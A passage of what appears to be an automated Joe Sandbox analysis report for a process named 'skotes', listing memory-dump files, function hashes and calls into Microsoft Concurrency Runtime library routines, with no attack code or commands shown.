                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pExecutionResource
                                                                                                                                                                                                                                                                • API String ID: 1772865662-359481074
                                                                                                                                                                                                                                                                • Opcode ID: 2624d4a26978e0434ba4bb9f9ce0c9e1ef10f2ccfa55d66b00df26183824f475
                                                                                                                                                                                                                                                                • Instruction ID: 0225f590fe9c6dd527c1eb0405d1a4744d2d7a5da6982376a67949df00c15ca5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2624d4a26978e0434ba4bb9f9ce0c9e1ef10f2ccfa55d66b00df26183824f475
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E321B975640209ABCB04EF64C982BFD77A5BF48310F11406DF5016B392DBB0AE15CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AC4F24
                                                                                                                                                                                                                                                                • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00AC4F66
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                                                • API String ID: 2663199487-3650809737
                                                                                                                                                                                                                                                                • Opcode ID: 421595f45337050c0380e5d6bbf25751caf1452db020540d081be8ee5ae2690e
                                                                                                                                                                                                                                                                • Instruction ID: 25f9ba22a25cc59d966c76fa912775dcaea1e4daf2470dbda5be7a764655af3b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 421595f45337050c0380e5d6bbf25751caf1452db020540d081be8ee5ae2690e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE21B035600219EFCB14EFA8C9A1EAD77B5BF48310F11406DF5069B692DB71AE01CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00ACBA0E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                                                • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                                                                                • API String ID: 348560076-3997890769
                                                                                                                                                                                                                                                                • Opcode ID: 4c5d3ea501597808cb179344315f6170601fd844be1fac9262967d34e476721b
                                                                                                                                                                                                                                                                • Instruction ID: d9b51a18c694d24cbd279b4faad2f513ba096f876a67acd3b37935057288e490
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c5d3ea501597808cb179344315f6170601fd844be1fac9262967d34e476721b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F101F971556715ADEB10BBB55E02FBB359C9F01748F12182DB651F3180EF35E8004AF1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SafeRWList.LIBCONCRT ref: 00AC6E73
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00AC4E7F
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC4E6E: List.LIBCMT ref: 00AC4E89
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AC6E85
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00AC6EAA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: eventObject
                                                                                                                                                                                                                                                                • API String ID: 1288476792-1680012138
                                                                                                                                                                                                                                                                • Opcode ID: 3e38df43acc3a058009bbc8fa560f25fb1182c9921fb2bd556956778ac072306
                                                                                                                                                                                                                                                                • Instruction ID: 011842ca0560be032fbff635648d37d0c0faa8570a2329945467fe30b68aabbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e38df43acc3a058009bbc8fa560f25fb1182c9921fb2bd556956778ac072306
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD11E576540208F7EB24FBA4CE86FEF73A86F00754F21451AF515A61D1EB70AA04C6B5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00ACA102
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00ACA126
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00ACA139
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
